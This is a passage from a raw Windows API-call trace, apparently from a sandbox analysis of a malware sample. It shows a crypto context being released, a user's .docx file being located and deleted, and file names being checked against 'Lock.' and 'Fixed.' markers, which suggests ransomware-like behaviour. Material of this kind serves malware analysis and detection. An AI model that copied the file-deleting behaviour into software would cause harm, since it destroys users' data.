wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.884] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0221.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.884] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0221.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.884] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.884] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.884] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.885] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.885] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.885] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.885] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.885] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.885] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0221.885] CryptReleaseContext (hProv=0xa7bcd0, dwFlags=0x0) returned 1 [0221.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.885] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.885] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.886] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.886] FreeLibrary (hLibModule=0x76390000) returned 1 [0221.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.886] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.886] CloseHandle (hObject=0x4dc) returned 1 [0221.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.887] CloseHandle (hObject=0x50c) returned 1 [0221.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.889] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.889] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.889] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.890] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/wrMr9 Fyz8.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\wrMr9 Fyz8.docx", lpFilePart=0x8cedf4*="wrMr9 Fyz8.docx") returned 0x29 [0221.890] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\wrMr9 Fyz8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\wrmr9 fyz8.docx")) returned 0x20 [0221.890] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\wrMr9 Fyz8.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa27a2b70, ftCreationTime.dwHighDateTime=0x1d55c8c, ftLastAccessTime.dwLowDateTime=0x9a3a18f0, ftLastAccessTime.dwHighDateTime=0x1d5964b, ftLastWriteTime.dwLowDateTime=0x9a3a18f0, ftLastWriteTime.dwHighDateTime=0x1d5964b, nFileSizeHigh=0x0, nFileSizeLow=0x454e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="wrMr9 Fyz8.docx", cAlternateFileName="WRMR9F~1.DOC")) returned 0x9e2138 [0221.890] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\wrMr9 Fyz8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\wrmr9 fyz8.docx")) returned 1 [0221.905] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa27a2b70, ftCreationTime.dwHighDateTime=0x1d55c8c, ftLastAccessTime.dwLowDateTime=0x9a3a18f0, ftLastAccessTime.dwHighDateTime=0x1d5964b, ftLastWriteTime.dwLowDateTime=0x9a3a18f0, ftLastWriteTime.dwHighDateTime=0x1d5964b, nFileSizeHigh=0x0, nFileSizeLow=0x454e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="wrMr9 Fyz8.docx", cAlternateFileName="WRMR9F~1.DOC")) returned 0 [0221.905] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0221.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854830 | out: hHeap=0x2af0000) returned 1 [0221.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.905] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0221.906] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0221.906] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0221.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b00 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0221.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f780 [0221.908] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/wrMr9 Fyz8.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\wrMr9 Fyz8.docx", lpFilePart=0x8cf650*="wrMr9 Fyz8.docx") returned 0x29 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f780 | out: hHeap=0x2af0000) returned 1 [0221.908] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\wrMr9 Fyz8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\wrmr9 fyz8.docx")) returned 0xffffffff [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b00 | out: hHeap=0x2af0000) returned 1 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0221.908] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0221.908] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.908] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0221.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xocV7C6c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocV7C6c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cV7C6c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V7C6c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7C6c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0221.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0221.909] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0221.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0221.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0221.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77ad0 [0221.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0221.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xocV7C6c.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocV7C6c.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cV7C6c.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V7C6c.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7C6c.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6c.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6c.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0221.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 